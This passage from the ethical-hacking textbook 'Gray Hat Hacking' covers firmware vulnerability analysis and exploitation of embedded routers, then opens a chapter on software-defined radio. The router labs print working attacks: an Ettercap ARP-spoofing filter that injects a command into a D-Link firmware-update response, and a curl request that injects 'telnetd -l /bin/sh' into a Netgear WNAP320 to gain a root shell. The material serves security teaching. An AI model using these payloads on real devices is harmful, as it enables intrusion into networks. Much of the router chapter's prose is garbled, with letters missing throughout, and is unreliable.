                                            " publ i c . j s " => " / bi n/ s s i " ,
                                      " . x ml " = > " / b i n / s s i "
                   " s a ve _c onf i gur e . c gi " => " / bi n/ s h" ,
                                      " hna p. c gi " => " / bi n/ s h" ,
                                      " t r 069. c gi " => " / bi n/ s h" ,
                                      " wi d g e t . c g i " = > " / b i n / s h " ,
                                                          " . c gi " => " / bi n/ s s i " ,
Gray Hat Hacking: The Ethical Hacker’s Handbook
                                                     " . h t ml "   => " / bi n/ s s i " ,
                                                       " . t xt "   => " / bi n/ s s i "
                                                         )

              We now ave an dea o ow o poeed and w begn ou vuneaby anay.

              Lab 21-2: Performing Vulnerability Analysis

              A  pon, vuneaby anay  no mu deen om wa a been aug
              n pevou ape. Command-njeon, oma-ng, bue-oveow, ue-ae-ee,
              monguaon, and many moe vuneabe an be eaed o. In  ae, we
              w ue a enque o nd ommand-njeon-ype vuneabe n exeuabe. Sne
              /bn/  a bnay, we w ook o oma ng a ue %s (o ng) and en
              ede e oupu o /dev/nu (meanng we don’ ae abou e oupu). T paen
               neeng beaue  may ndae a sprintf unon a’ eang a ommand, w
              a poenay ue-onoed vaabe, o ue w popen o system. Fo exampe, a
              ommand o ee  anoe o  ave mg be eaed a oow:
              sprintf(cmd,"ping –q –c 1 %s > /dev/null",variable)

                 Connung om e qua-oo deoy om Lab 21-1, we w anayze e 
              bnay. I a vaabe  onoed by e aake and no anzed, and cmd  ued o
              exeue n a e, e aake an nje e ommand no e nended ommand. In
               ae, we ave wo neeng ng a appea o downoad a e:
              ➊$ strings bin/ssi | grep "%s" | grep "/dev/null"
              wget -P /tmp/ %s > /dev/null
              wget %s -O %s >/dev/null &

                                 NOTE For ease of the use, the SSI binary and previous command are also
                                 located in Lab 21-2.

                  Amed w ee wo ng, we w begn o do ome eveng o e bnay o ee
               we ave ono ove e vaabe. Gda w be ou oo o oe o  ab, a 
               avaabe o ee and dued n Cape 4. Ree o Cape 4 o nuon on
              nang and eang a poje.
                  Te man objeve o e Gda anay  o deemne wee e ng  ued
              n a way a e aake a a ane o ae . Ae openng e SSI bnay n Gda
              and enung a e poeo  e o MIPS, we en ake e oowng ep:
                   1. Sea o e ng o nee.
                   2. Deemne ow e ng  ued.
                   3. Deemne wee e URL ome om (   adoded, we ae no neeed
                      n ).
                                                                          Chapter 21: Exploiting Embedded Devices
  Go o e Sea | Fo Sng menu o bng up e ex ea een, own ee.
Leave e deau and en k Sea.

   One  ompee, ea o “wge ” (noe e pae ae wget) and you w ee

                                                                                                                    PART IV
e wo ng we ound ung e ❶strings ommand ne n e . We nd ony wo
ouene o “wge ”: one  e a oma ng and e oe  a eeene o e
a ng.

    By doube-kng e gged eu, we ae aken o a adde n e daemby
ng. One n e Lng wndow, pe ctrl-shift-f we e uo  a e adde
00428458 and doube-k e ony eeene a 00409010. You w now ee daembed
ode a e eeene on e e and a deomped veon o e daembed ode on
Gray Hat Hacking: The Ethical Hacker’s Handbook
              e g. Song down, we ee a e ng  beng ued n a sprintf o onu a
              downoad ommand, w  beng paed o system, a own nex.

                 A  pon, we a ea know a e ng  beng ued o make a a o system.
              Fom ee, we need o undeand ow e URL n e oma ng  povded. T
              eque u o ae e ono ow o e pogam o  pon.
                 To ae e ono ow o e eny o  uboune/unon, we need o o o
              e op o e unon and ee e adde (0040830) on e e. One e adde 
              eeed, we mpy pe ctrl-shift-f o ge o e eeene, a own ee.
                                                                          Chapter 21: Exploiting Embedded Devices
   Te o-eeene o e downoad oune  auay a ookup abe w unon
pone o e eny pon o ea ommand. Te ode eae o a ommand and
jump o e oune pone a  adjaen o . You w ee e ommand o “IPv6
Funon,” “Downoad FW and anguage o DUT,” and “ge_wan_p,” ju above and
beow e adde. Noe a e ommand ae n e om o e o name, unon
pone, and ong name. Beaue   a ookup abe, we need o nd e begnnng o
e abe n ode o oae a o-eeene o . By ong up, we ee a e adde
004466d appea o be e bae o e jump abe. Peng ctrl-shift-f on a adde
ge u e ode a poee e jump abe, a own nex (ssi_cgi_tool_main).

                                                                                                                    PART IV
    Aoug we ave no ompeey aed e ogn o e yem a bak o e oo,
  ae o ay a  pon bak o e cgi ommand o downoad e mwae. A ew
gep ➋ ➍ n e oo o e ng “downoad_w_p” gve u e ogn ➌ ➎. A 
pon, we w move on o aempng o expo e deve oug e mwae updae.
➋$ grep -r download_fw_lp .
➌./www/Firmware.htm:<input type="hidden" id="action" name="action"
 value="download_fw_lp">
Binary file ./bin/ssi matches
➍$ grep -C 7 download_fw_lp www/Firmware.htm
<form id="form3" name="form3" method="POST" action="apply.cgi">
<input type="hidden" id="html_response_page" name="html_response_page"
value="Firmware.htm">
<input type="hidden" name="html_response_return_page" value="Firmware.htm">
<input type="hidden" id="html_response_message" name="html_response_message"
value="dl_fw_lp">
<input type="hidden" id="file_link" name="file_link" value="">
<input type="hidden" id="file_name" name="file_name" value="">
<input type="hidden" id="update_type" name="update_type" value="">
➎<input type="hidden" id="action" name="action" value="download_fw_lp">
</form>
Gray Hat Hacking: The Ethical Hacker’s Handbook
              Dynamic Analysis with Hardware
              Te a anay poon o e aemen  ompee. Fom  pon owad, we
              w be ookng a e yem a  un on e adwae, no emuaon. We need o e
              up an envonmen o neepng eque om e deve o e WAN, onne e
              DAP-1320 o ou e newok, and begn exeng e mwae updae poe. Te
              end goa  o exeue omeng on e wee exende oug ommand njeon.

              The Test Environment Setup
              Te e eup we’ve oen ue 64-b Ka Lnux 2021.1, Eeap, e DAP-1320
              wee ange exende w mwae veon 1.11, and a ok wee newok. Te
              dea  o ARP-poo e DAP-1320 o a a a o and om e deve goe oug
              ou Ka Lnux yem. Aoug we oud ave mpy pu a deve nne beween e
              exende and e oue a an owad a ae npeon and modaon, ARP
              poong woud be e key aak meanm ued n e ed.

              Ettercap
              A a quk eee, Adde Reouon Pooo (ARP)  e meanm o eovng
              an IP adde o  meda ae ono (MAC) adde. Te MAC adde  a unque
              adde agned by e manuaue o e newok deve. Smpy pu, wen a aon
              need o ommunae w anoe aon,  ue ARP o deemne e MAC adde
              aoaed w e IP o ue. ARP poong eevey poon e ARP abe o e
              aon, aung em o ue e aake’ MAC adde nead o e aua MAC
              adde o e age aon. Teeoe, a a o a denaon avee oug e
              aake’ aon. T eevey pu a deve nne wou u avng o pyay
              mody e newok.
                 Eeap  a oo a aow u o ARP-poo o e pupoe o peomng man-n-
              e-mdde (MITM) aak, pang e pake, modyng em, and en owadng
              em o e epen. To begn w, we ue Eeap o ee e a beween e
              deve and e Inene by ung e oowng ommand (n  exampe, e deve 
              192.168.1.173 and e gaeway  192.168.1.1):
              $ ettercap –T –q –M arp:remote /192.168.1.173// /192.168.1.1//

                 One Eeap a aed, we w ue Weak o vew e a a we nea w
              e deve. One Weak  aed and e apue a been naed, we an ek
              o a mwae updae on e deve’ upgade page, a own nex.
                                                               Chapter 21: Exploiting Embedded Devices

   Ck e Cek o New Fmwae buon and en oow e TCP eam wn

                                                                                                         PART IV
Weak. We now ee a e deve goe o p://wpd.dnk.om.w/oue/
mwae/quey.ap?mode=DAP-1320_Ax_Deau n e  wo ne and a e
epone  XML-enoded daa, a own nex.
Gray Hat Hacking: The Ethical Hacker’s Handbook
                By gong o e URL we apued, we an ee a e XML onan e FW veon’
              majo and mno numbe, e downoad e, and eeae noe.

                 Amed w  nomaon, we an aume a  we ange e mno numbe
              o 12 and e mwae nk o a e ommand, we w oe e deve o aemp o
              updae and, onequeny, un ou ommand. In ode o aomp  ak, we need
              o eae an Eeap e ➊ (pevouy aved and dpayed ee), ompe  ➋, and
              en un  ➌, a oow:
              ➊$ cat ettercap.filter
              if (ip.proto == TCP && tcp.src == 80) {
                  msg("Processing Minor Response...\n");
                  if (search(DATA.data, "<Minor>11")) {
                      replace("<Minor>11", "<Minor>12");
                      msg("zapped Minor version!\n");
                  }

                     if (ip.proto == TCP && tcp.src == 80) {
                         msg("Processing Firmware Response...\n");
                         if (search(DATA.data, "http://d"))
                         {
                             replace("http://d", "`reboot`");
                             msg("zapped firmware!\n");
                         }
                     }
              }
              ➋$ etterfilter ettercap-reboot.filter -o ettercap-reboot.ef
              <output omitted for brevity>
              ➌$ ettercap -T -q -F ettercap-reboot.ef -M arp:remote
                /192.168.1.173// /192.168.1.1//
              <output omitted for brevity>
                                                                        Chapter 21: Exploiting Embedded Devices
   In ode o deemne  ou ommand  geng exeued, we need o png e box
and mono e png meage a we ue an upgade. Bu , noe a ae kng
e Cek o New Fmwae buon, we now ee a ee  a 1.12 veon avaabe
o downoad.

                                                                                                                  PART IV
   Po o kng e Upgade Fmwae buon, we need o e up ou png o mono
e deve. Wen we k e Upgade Fmwae buon, we oud ee e oowng
downoad poge box:

$ ping 192.168.1.173
64 bytes from 192.168.1.173: icmp_seq=56 ttl=64 time=2.07 ms
64 bytes from 192.168.1.173: icmp_seq=57 ttl=64 time=2.20 ms
64 bytes from 192.168.0.63: icmp_seq=58 ttl=64 time=3.00 ms
Gray Hat Hacking: The Ethical Hacker’s Handbook
              ➊From 192.168.1.173 icmp_seq=110 Destination Host Unreachable
              From 192.168.1.173 icmp_seq=111 Destination Host Unreachable
              From 192.168.1.173 icmp_seq=112 Destination Host Unreachable
              From 192.168.1.173 icmp_seq=113 Destination Host Unreachable
              From 192.168.1.173 icmp_seq=114 Destination Host Unreachable
              From 192.168.1.173 icmp_seq=115 Destination Host Unreachable
              From 192.168.1.173 icmp_seq=116 Destination Host Unreachable
              From 192.168.1.173 icmp_seq=117 Destination Host Unreachable
              From 192.168.1.173 icmp_seq=118 Destination Host Unreachable
              From 192.168.1.173 icmp_seq=119 Destination Host Unreachable
              From 192.168.1.173 icmp_seq=120 Destination Host Unreachable
              From 192.168.1.173 icmp_seq=121 Destination Host Unreachable
              ➋64 bytes from 192.168.1.173: icmp_seq=122 ttl=64 time=1262 ms
              64 bytes from 192.168.1.173: icmp_seq=123 ttl=64 time=239 ms
              64 bytes from 192.168.1.173: icmp_seq=124 ttl=64 time=2.00 ms

                 You w noe a e o beome noneponve ➊ and ae ome bak onne ➋.
              T ndae a e box wa ebooed. A  pon, we’ve poven a we an nje
              a ommand no e upgade URL and e deve w exeue . Wou upoadng
              an exeuabe o e deve, you ae med by wa  on e deve. Fo exampe, a
              pevouy expaned,  ened  omped no e BuyBox (  no on  yem),
              you an ju a  o ae e e wou a pawod, a oow:
              telnetd –l /bin/sh

                 T appoa  demonaed n e nex eon. I needed, you oud o-ompe
              a bnay u a nea o  poeo and en upoad  va p o p, a Cag
              Hene a demonaed,2 o you oud ue anoe meod.

              Dynamic Analysis with Emulation
              I un ou, n ome ae, no o be neeay o ave adwae n and o peom
              vuneaby anay and expo mwae.

              FirmAE
              Te FmAE3 oo exend e apaby o FIRMADYNE4 o aow o e emuaon
              o moe mwae by ung vaou abaon o eve and e QEMU ypevo.
              Te ou o e abaon  o aow e unnng o web eve, a a  a ommon
              aak veo. Te beauy o  appoa  a you do no ave o buy e adwae
              o e e mwae. T poweu appoa aow o aed eng n paae. Te
              auo o FmAE ad a ue ae o 79.36 peen on 1,124 deve and ound 12
              new 0-day,5 w  no bad a a. In e oowng ab, we w e up and exeue
              FmAE.

              Lab 21-3: Setting Up FirmAE

              I you wan o oow aong n  ab, we w be ung Ka 2021-1, unnng n VMwae
              o VuaBox, w NAT newok eng. F, we need o e up e FmAE oo by
              ung e nuon ound on e FmAE GHub (ee e “Fo Fue Readng”
                                                                           Chapter 21: Exploiting Embedded Devices
eon a e end o  ape). Te na ep ae daay mped ove
FIRMADYNE and ony eque ee pakage, bud-eena, ene, and g, o be
naed oude o e na poe. Te na ao ee on e a a e bnwak
naaon om Lab 21-1 wa ompeed. Te na poe  own ee:
$ sudo apt-get install build-essential git telnet
<output skipped throughout this lab for brevity>
$ git clone --recursive https://github.com/pr0v3rbs/FirmAE
$ cd FirmAE
$ ./download.sh
Downloading binaries...
<output skipped throughout this lab for brevity>
$ ./install.sh
<output skipped throughout this lab for brevity>
$ ./init.sh
+ sudo service postgresql restart
+ echo 'Waiting for DB to start...'
Waiting for DB to start...
+ sleep 5

Lab 21-4: Emulating Firmware

                                                                                                                     PART IV
Now a you ave e up e envonmen, you may emuae ampe mwae (agan, a
debed on e FmAE GHub).
   F, ung e un. p, ek e mwae povded on e GHub o 
ab. T ep w exa e mage, ge e aeue, ne e newok ong, and
aoae an ID n e daabae o e anay ( may ake a we, o be paen):
$ sudo -E ./run.sh -c netgear WNAP320_Firmware_Version_2.0.3.zip
[*] WNAP320_Firmware_Version_2.0.3.zip emulation start!!!
[*] extract done!!!
[*] get architecture done!!!
mke2fs 1.44.1 (24-Mar-2018)
e2fsck 1.44.1 (24-Mar-2018)
[*] infer network start!!!

[IID] 3
[MODE] check
[+] Network reachable on 192.168.0.100!
[+] Web service on 192.168.0.100
[*] cleanup
======================================

   Now a you know wa e IP , un e emuao w debuggng enabed o you
an nea w e e o un gdb. In ou ae, we mpy wan o ae e e ➊ and
ee wa  avaabe n BuyBox ➋. Fom e oupu o BuyBox, we ee a ened ➌ 
avaabe  we an exeue pogam va ommand njeon:
$ sudo -E ./run.sh -d netgear WNAP320_Firmware_Version_2.0.3.zip
[*] WNAP320_Firmware_Version_2.0.3.zip emulation start!!!
[*] extract done!!!
[*] get architecture done!!!
[*] WNAP320_Firmware_Version_2.0.3.zip already succeed emulation!!!
Gray Hat Hacking: The Ethical Hacker’s Handbook
              [IID] 3
              [MODE] debug
              [+] Network reachable on 192.168.0.100!
              [+] Web service on 192.168.0.100
              [+] Run debug!
              Creating TAP device tap3_0...
              Set 'tap3_0' persistent and owned by uid 0
              Bringing up TAP device...
              Starting emulation of firmware... 192.168.0.100 true true 17.363515215
              18.767963507
              [*] firmware - WNAP320_Firmware_Version_2.0.3
              [*] IP - 192.168.0.100
              [*] connecting to netcat (192.168.0.100:31337)
              [+] netcat connected
              ------------------------------
              |       FirmAE Debugger      |
              ------------------------------
              1. connect to socat
              2. connect to shell
              3. tcpdump
              4. run gdbserver
              5. file transfer
              6. exit
              ➊> 2
              Trying 192.168.0.100...
              Connected to 192.168.0.100.
              Escape character is '^]'.

              / # cd bin
              ➋/bin # busybox
              BusyBox v1.11.0 (2011-06-23 15:54:48 IST) multi-call binary
              Copyright (C) 1998-2008 Erik Andersen, Rob Landley, Denys Vlasenko
              and others. Licensed under GPLv2.
              See source distribution for full notice.

              Usage: busybox [function] [arguments]...
                 or: function [arguments]...

                           BusyBox is a multi-call binary that combines many common Unix
                           utilities into a single executable. Most people will create a
                           link to busybox for each function they wish to use and BusyBox
                           will act like whatever it was invoked as!

              Currently defined functions:
                      [, [[, addgroup, adduser, ar, arp, arping, ash, awk, basename, bunzip2,
              bzcat, bzip2, cat, catv, chgrp, chmod, chown, chroot, cksum, clear, cmp, cp,
              crond, crontab, cut, date, dd,
                      delgroup, df, diff, dirname, dmesg, dos2unix, du, dumpleases, echo, egrep,
              env, expr, false, fgrep, find, fold, free, freeramdisk, ftpget, ftpput, fuser,
              getopt, getty, grep, gunzip,
                      gzip, halt, head, hexdump, hostname, id, ifconfig, ifdown, ifup, inetd,
              init, insmod, ip, ipcrm, ipcs, kill, killall, killall5, klogd, last, length, less,
              linuxrc, ln, logger, login,
                      logname, logread, losetup, ls, lsmod, md5sum, mesg, mkdir, mkfifo, mknod,
              mktemp, modprobe, more, mount, mountpoint, mv, nice, nmeter, nohup, od, passwd,
              pgrep, pidof, ping, pipe_progress,
                      pivot_root, poweroff, printenv, printf, ps, pwd, readlink, readprofile,
              reboot, renice, reset, resize, rm, rmdir, rmmod, route, runlevel, sed, seq,
              setsid, sh, sha1sum, sleep, sort,
                                                                       Chapter 21: Exploiting Embedded Devices
        start-stop-daemon, stat, strings, su, sulogin, switch_root, sync, sysctl,
syslogd, tail, tar, tee, telnet, ➌telnetd, test, tftp, time, top, touch, true,
tty, udhcpc, udhcpd, umount,
        uname, uniq, unix2dos, uptime, usleep, vconfig, vi, watch, wc, wget,
which, who, whoami, xargs, yes, zcat

  I a any me you me up e peedng ommand and wan o ee e daabae
and envonmen, mpy un e oowng ommand:
$ psql -d postgres -U firmadyne -h 127.0.0.1 \
> -q -c 'DROP DATABASE "firmware"'
Password for user firmadyne:
$ sudo -u postgres createdb -O firmadyne firmware
$ sudo -u postgres psql -d firmware \
> < ./database/schema
$ sudo rm -rf ./images/*.tar.gz
$ sudo rm -rf scratch/

   A  pon, e mwae oud be unnng on e peedng IP a a ap deve. You
oud ao be abe o onne o  vua neae om e mane on w you
ae unnng QEMU. Fom wn e VM, open a web bowe and y o onne o
e need IP, a own nex. You may need o wa a mnue o e web eve o uy
a ae e emuao aune e mwae.

                                                                                                                 PART IV
Gray Hat Hacking: The Ethical Hacker’s Handbook
                Te edena ae admn/pawod, w an be ound onne. And ju ke a,
              we ae ogged n o an emuaed oue, a own ee.

              Lab 21-5: Exploiting Firmware

              So a we ave emuaed e Negea WNAP320 mwae n QEMU. Now   me
              o do wa we ame o: expo e mwae. Domn Cen6 and  eam ound a
              ommand njeon vuneaby n  mwae, unnng n FIRMADYNE. Le’ e
               w FmAE and ee   an be expoed:
              $ nmap 192.168.0.100

              Starting Nmap 7.01 ( https://nmap.org ) at 2017-12-10 21:54 EST
              Nmap scan report for 192.168.0.100
              Host is up (0.0055s latency).
              Not shown: 997 closed ports
              PORT    STATE SERVICE
              22/tcp open ssh
              80/tcp open http
              443/tcp open https

              Nmap done: 1 IP address (1 host up) scanned in 1.30 seconds
                                                                        Chapter 21: Exploiting Embedded Devices
➊$ curl -L --max-redir 0 -m 5 -s -f -X POST \
> -d "macAddress=000000000000;telnetd -l /bin/sh;&reginfo=1&writeData=Submit" \
http://192.168.0.100/boardDataWW.php
<html>
     <head>
            <title>Netgear</title>
            <style>

<truncated for brevity>

$ nmap 192.168.0.100

Starting Nmap 7.01 ( https://nmap.org ) at 2017-12-10 22:00 EST
Nmap scan report for 192.168.0.100
Host is up (0.0022s latency).
Not shown: 996 closed ports
PORT    STATE SERVICE
22/tcp open ssh
➋23/tcp open telnet
80/tcp open http
443/tcp open https

Nmap done: 1 IP address (1 host up) scanned in 2.39 seconds
$ telnet 192.168.0.100
Trying 192.168.0.100...
Connected to 192.168.0.100.
Escape character is '^]'.
/home/www # ls

                                                                                                                  PART IV
BackupConfig.php    boardDataWW.php     checkSession.php    data.php
header.php          index.php           login_header.php    packetCapture.php
saveTable.php       test.php            tmpl
<truncated for brevity>
/home/www # id
➌uid=0(root) gid=0(root)
/home/www #

   Fom e pevou oupu, you oud noe a we ave njeed a ommand o
a e ene eve ➊. Te telnetd –l /bin/sh agumen a e ene eve on e
deau po and bnd  o e “/bn/” e. Te nmap an ow a po 23 
now open ➋. Ae onneng o ene, you w noe a e ue  oo ➌. Aoug
 a been done on emuaed mwae, e ame an be aomped on e aua
mwae. A  pon, e aake a oo ae on e deve and an poenay ue
e deve a a aunng pon o oe aak on e newok.

Summary
T ape demonaed vuneaby anay, bo om a a pon o vew and
a dynam pon o vew. I ao demonaed expong a ommand-njeon aak
bo om a dynam pon o vew and an emuaed pon o vew. In e ae ae,
you eaned a vuneabe an be doveed and poo-o-onep expo an be
deveoped wou even puang e adwae equpmen. Ou ope  a, ung
ee enque, ea ake w nd euy vuneabe n embedded deve
and doe em n an ea manne, u makng u a moe eue.
Gray Hat Hacking: The Ethical Hacker’s Handbook
              For Further Reading
              ARP spoofing en.wkpeda.og/wk/ARP_poong
              BusyBox buybox.ne
              Craig Heffner’s Binwalk gub.om/ReFmLab/bnwak
              Craig Heffner’s blog (creator of binwalk) www.devy0.om/bog/
              Ettercap eeap.gub.o/Eeap
              FirmAE gub.om/p0v3b/FmAE
              “FirmAE: Towards Large-Scale Emulation of IoT Firmware for Dynamic
              Analysis” www.aa.og/2020/e/web/6a-4_mae-de.pd
              Firmadyne GitHub gub.om/madyne/madyne
              Ghidra gda-e.og/

              References
                   1. Bue Snee, “Seuy Rk o Embedded Syem,” Schneier on Security,
                      Januay 9, 2014, p://www.nee.om/bog/ave/2014/01/euy_
                      k_9.m.
                   2. Cag Hene, “Hakng e Lnky WMB54G, Ung p o Upoad a Bnay,”
                      /DEV/TTYS0, Juy 12, 2012, www.devy0.om/2012/07/akng-e-nky-
                      wmb54g/.
                   3. Mngeun Km, Dongkwan Km, Eunoo Km, Suyeon Km, Yeongn Km, and
                      Yongdae Km, p://gub.om/p0v3b/FmAE.
                   4. Domn Cen, FIRMADYNE, p://gub.om/madyne/madyne.
                   5. Km, op. .
                   6. Domn Cen, “D-Lnk/Negea FIRMADYNE Command Injeon/
                      Bue Oveow,” Pake Som, Febuay 26, 2016, CVE 2016-1555,
                      p://pakeomeuy.om/e/135956/D-Lnk-Negea-FIRMADYNE-
                      Command-Injeon-Bue-Oveow.m.
  Software-Defined Radio
                                                                             CHAPTER

                                                                                         22
  In this chapter, we cover the following topics:
      • Getting started with software-defined radio (SDR)
      • A step-by-step process (SCRAPE) for analyzing simple RF devices

Wireless devices are found in all aspects of our lives. Although these devices afford us
greater freedom by eliminating wires, they also open proximity and remote attack surfaces.
For example, a sensor that is hard-wired and not exposed to the public is far more difficult
to access than a wireless sensor that has a range exceeding the perimeter of the building.
Of course, simply having access to the wireless signal does not guarantee that nefarious
activities can be accomplished, but it certainly opens a door.
   Radio frequency (RF) hacking is far too complicated of a subject to adequately
cover in a single chapter. Our goal is to use a simple device to introduce you to afford-
able software-defined radio (SDR), open source software for SDR, and a process to
evaluate and test products that utilize custom or semi-custom wireless protocols for
communications.

Getting Started with SDR
SDR is a radio that is implemented using modifiable software components to process raw
data instead of relying solely on application-specific RF hardware and digital signal pro-
cessors. SDR uses the resources of a general-purpose processor, such as a computer run-
ning Linux, to provide the signal processing, along with general-purpose RF hardware
to capture and transmit data. Advantages of SDR include the ability to process a wide
variety of signals and frequencies within a single (and potentially remotely updateable)
firmware package. Additionally, SDR provides the developer/researcher flexibility when
prototyping new systems.

What to Buy
Now that you have an idea of what SDR is, it is time to find your new toy. Some
examples of SDR are HackRF, bladeRF, and USRP. Each of these uses a USB port on the
computer and may be used with open source software such as GNU Radio. Table 22-1
provides a quick comparison of these three devices.

Gray Hat Hacking: The Ethical Hacker’s Handbook
                                              HackRF             bladeRF 2.0 micro xA4   USRP B200
                Operating                     1 MHz to 6 GHz     47 MHz to 6 GHz         70 MHz to 6 GHz
                frequency
                Bandwidth                     20 MHz (6 GHz)     56 MHz                  56 MHz
                Duplex                        Half               Full                    Full
                Bus                           USB 2              USB 3                   USB 3
                ADC resolution                8 bit              12 bit                  12 bit
                Samples per                   20 MSps            61 MSps                 61 MSps
                second                        (million samples
                                              per second)
                Approximate cost              $340               $480                    $900
Table 22-1 Comparison of Affordable SDR

                  The operating frequency determines what frequencies the radio can tune to. For
              example, Bluetooth operates between 2.4 GHz and 2.48 GHz over 40 to 80 channels,
              depending on the version. FM radio operates between 87.8 MHz and 108 MHz over
              101 channels. Add-ons, such as the Ham It Up Nano, are available to effectively lower
              their lower limits.
                  The bandwidth is the amount of the RF spectrum that can be scanned by the appli-
              cation/device. The listed bandwidths are published on the respective websites, but
              may differ depending on the firmware loaded. For example, HackRF firmware version
              2017.02.01 or later supports a sweep mode that allows the device to sweep over the full
              6 GHz range. One potential benefit of the increased bandwidth is the ability to monitor
              all channels of Bluetooth simultaneously (80 MHz).
                  Duplex refers to how two systems can communicate with one another. Full duplex
              means that the device can both transmit and receive simultaneously. Half duplex, as you
              have no doubt guessed, means that the device can transmit and receive data, but not at
              the same time. Examples of half-duplex communications are walkie-talkies and many
              computer Voice over IP (VoIP) applications. When both parties attempt to speak at the
              same time, collisions occur and data is lost. Although full duplex is more flexible, the
              duplex of SDR will likely not hinder the effectiveness of the analysis.
                  Analog-to-digital conversion (ADC) resolution refers to the number of distinct voltage
              values each sample can take on. For example, an 8-bit ADC with a voltage range of 4V
              has a resolution of 15.6 mV, or 0.39 percent. In combination with the sampling rate,
              more bits of ADC resolution result in a more accurate digital representation of the
              analog signal.
                  The published samples per second rates are dependent on the USB throughput, the
              CPU, the ADC converter, and the size per sample. For example, the USRP B200 value
              of 61 MSps is based on using 16-bit quadrature samples; however, the system can be con-
              figured to use 8-bit quadrature samples, which effectively doubles the samples per second
              throughput. The lower supported HackRF sample per second value is both a result of the
              ADC chosen and the USB throughput.
                                                                          Chapter 22: Software-Defined Radio
   In addition to purchasing an SDR, you will likely need to purchase several cables,
dummy loads, attenuators, and antennas with differing frequency ranges. For testing
devices in your lab, directional antennas come in handy to help isolate the sources.
Finally, although not necessary, a simple isolation chamber (or box) can be extremely
useful when dealing with common frequencies such as 2.4 GHz. Each of the SDRs listed
in Table 22-1 has an SMA (Subminiature version A) female connector on the board for
connecting cables, attenuators, and antennas.

Not So Quick: Know the Rules
When you consider the number of wireless devices we are surrounded by—radios, tele-
phones, satellite, Wi-Fi, and so on—it stands to reason that a governing body controls
the air. Two such governing bodies are the Federal Communications Commission (FCC)
and the International Telecommunication Union (ITU). In the US, the FCC regulates
the RF spectrum, and you must be licensed to transmit on much of the RF spectrum
with an unlicensed device such as an SDR. To become licensed to operate a radio, you
must take an exam to demonstrate your knowledge of the rules and regulations. Visit
www.arrl.org to learn more about licensing and the rules for operating a radio legally.

                                                                                                               PART IV
Learn by Example
Now that you’ve been introduced to SDR, we’ll go through the process of assessing a
new device so that you can learn how to use an SDR and the associated software. For the
remainder of this chapter, we will be using an Ubuntu system with the HackRF SDR
and GNU Radio tools to evaluate an indoor wireless power outlet device. There’s nothing
special about this device choice, other than it was in my current inventory and is simple
enough to cover within a single chapter. HackRF was chosen because of its combination
of features, price, and ease of access. The software used throughout the chapter should
work with any of the affordable SDR platforms.
   The general process we will follow in this chapter is known as SCRAPE, which stands
for Search, Capture, Replay, Analyze, Preview, and Execute.

            NOTE Because the devices have to be purchased and the versions of the
            outlets/remotes are not guaranteed when you purchase them, this section
            does not contain a lab. In the event that you have the hardware or want
            to simulate the work, the GNU Radio flow graphs, installation instructions,
            capture files, and source code can be found on the book’s download site.

Search
During the Search phase of the SCRAPE process, we aim to find out as much as possible
about the radio’s characteristics without having to use any specialized equipment.
   You already know that the FCC regulates the radio spectrum, but you might not
know that most devices that transmit must be certified by the FCC to ensure they oper-
ate within the rules established. When the product or module is certified, an FCC ID is
Gray Hat Hacking: The Ethical Hacker’s Handbook
              Figure 22-1
              Picture of the
              remote

              issued and must be visible on the product or module. This FCC ID is going to be our
              search key for researching the RF characteristics.
                 The device we are going to look at is the Prime Indoor Wireless Power Outlet remote
              (see Figure 22-1). It is not required that you purchase this device in order to follow along
              in the chapter. The remote’s FCC ID is QJX-TXTNRC. The ID can be found on a label
              on the exterior of the product. An FCC Equipment Authorization Search fails to find the
              report for this device unless you use “-TXTNRC” for the product code. In order to get
              around issues like this, I simply use Google for the search, like so:
                        www.google.com/search?q=fcc+QJX-TXTNRC
              The website fccid.io typically shows up among the top hits. In our case, the top link was
              https://fccid.io/QJX-TXTNRC.
                 At fccid.io, we find several linked documents and reports that tell us the operating
              frequency range for this device is 315.0 MHz to 315.0 MHz (or simply 315.0 MHz).
              These reports contain operating frequencies, sample waveforms that indicate the type
              of transmission, time measurements that indicate the packet length, and various pulse
              widths. We will use the operating frequency range as our starting point and leave the
              remainder of the test report as a sanity check after we complete the testing.

              Capture
              Armed with the operating frequency, we have enough information to begin experiment-
              ing with SDR and the device under test (DUT). At this point, we need to have the
              SDR (HackRF) and the software (gnuradio and HackRF tools) installed and an antenna
              capable of receiving 315 MHz (ANT500 75 MHz to 1 GHz). Although we will not go
              through the install process directly, I do recommend using PyBOMBS and installing the
              tools to your home directory using the prefix argument to PyBOMBS. By installing it to
                                                                          Chapter 22: Software-Defined Radio
your home directory, you will have the ability to experiment with several configurations
and more easily recover from any future update issues. On the book’s download site, you
can find a README.txt file with instructions for installing the tools, the flow graphs
referenced throughout the chapter for use in GNU Radio Companion, and capture files
to use for analysis in the event you don’t have the device being referenced.
   GNU Radio Companion (launched by running gnuradio_companion) is a GUI tool
that allows the user to create a software radio by chaining one or many signal-processing
blocks together. The tool generates Python code under the covers and allows the user to
define variables and use Python statements within the GUI. To capture the signal for
future analysis, refer to the flow graph represented in Figure 22-2. I encourage you to
browse the block panel tree and become familiar with the available blocks. However, for
the time being, refer to Table 22-2 for descriptions of the blocks used within the flow
graph. To minimize the amount of transmissions required, a file sink is used to write the
data for both replay and offline analysis.

             NOTE The sample rate and channel frequency must be noted because they
             will be necessary when using offline tools and replay attacks.

                                                                                                               PART IV

Figure 22-2 Capture flow graph: remote_analysis.grc
Gray Hat Hacking: The Ethical Hacker’s Handbook
                Name                     Purpose                 Parameters of Interest
                Options                  Provides the overall    ID: The name of the Python code that is generated.
                                         flow graph options      Generate Options: The GUI framework to use
                                                                 (QT by default). You may only use the blocks that
                                                                 correspond to this decision (QT or Wx).
                Osmocom                  Provides a receiver     Sample Rate: The number of samples per second.
                Source                   to interface with the   Ch0: Frequency: The carrier frequency to tune to
                                         hardware                (316 MHz is used in order to account for DC offset).
                                                                 Ch0: RF Gain: Typically, this should be zero unless
                                                                 you have a specific reason.
                File Sink                Specifies that the      File: The filename for the captured samples.
                                         samples are to be
                                         written to a file
                QT GUI                   Plots the received      Center Frequency: The frequency in the middle
                Frequency Sink           signal in terms         of the graph (should be set to Ch0 Frequency).
                                         of frequency and        Bandwidth: Set to Sample Rate.
                                         amplitude
                Variable                 Provides variables to   The value can be any legal Python statement.
                                         use for common values   An example would be int(400/27).
                                         such as Sample Rate
Table 22-2 Description of GNU Radio Blocks Needed for Capture

                 During the Capture phase, I attempted to capture a file for each known stimulus.
              With our DUT, the known stimuli are pushing the on/off button for each receptacle.
              Additionally, to aid in our understanding of the device’s protocol, two remotes are used
              for comparison. At this point, based on our understanding from the test report, we
              should see a spike at or around 315 MHz, as shown in Figure 22-3. You will also notice
